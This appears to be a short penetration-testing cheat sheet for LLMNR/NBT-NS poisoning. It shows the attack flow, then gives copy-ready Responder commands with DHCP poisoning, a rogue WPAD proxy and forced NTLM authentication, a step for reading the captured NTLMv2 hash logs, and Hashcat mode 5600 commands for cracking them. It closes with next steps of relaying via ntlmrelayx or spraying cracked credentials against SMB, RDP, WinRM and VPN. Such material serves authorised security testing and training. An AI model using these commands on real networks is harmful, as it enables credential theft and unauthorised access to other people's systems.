# LLMNR/NBT-NS Poisoning# Attack Flowplain text ⧉ copy
DNS query fails → LLMNR/NBT-NS multicast fallback → Responder replies "I am that host"
→ Victim authenticates via NTLM → NTLMv2 hash captured
→ Crack offline (Hashcat) OR relay (ntlmrelayx) # Executionbash ⧉ copy
# Standard
sudo responder -I eth0 -dw
sudo responder -I eth0 -dwv
# Tee output
sudo responder -I eth0 -dwv 2>&1 | tee responder_output.txt
# Forced NTLM via WPAD (no victim typo needed)
sudo responder -I eth0 -dwPv
sudo responder -I eth0 -dwPv 2>&1 | tee responder_output.txt
# Over VPN
sudo responder -I tun0 -dwPv
sudo responder -I tun0 -dwPv 2>&1 | tee responder_output.txt Flag Purpose -IInterface -dDHCP poisoning -wRogue WPAD proxy -PForce NTLM auth (requires -w) -vVerbose
View captured hashes:
bash ⧉ copy
cd /usr/share/responder/logs
ls
cat * txt # Cracking (Hashcat - Mode 5600)bash ⧉ copy
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 5600 captured_hash.txt --show # Next StepsResult Action Hash captured Crack offline (Hashcat) or relay (ntlmrelayx) Hash cracked Spray against SMB, RDP, WinRM, VPN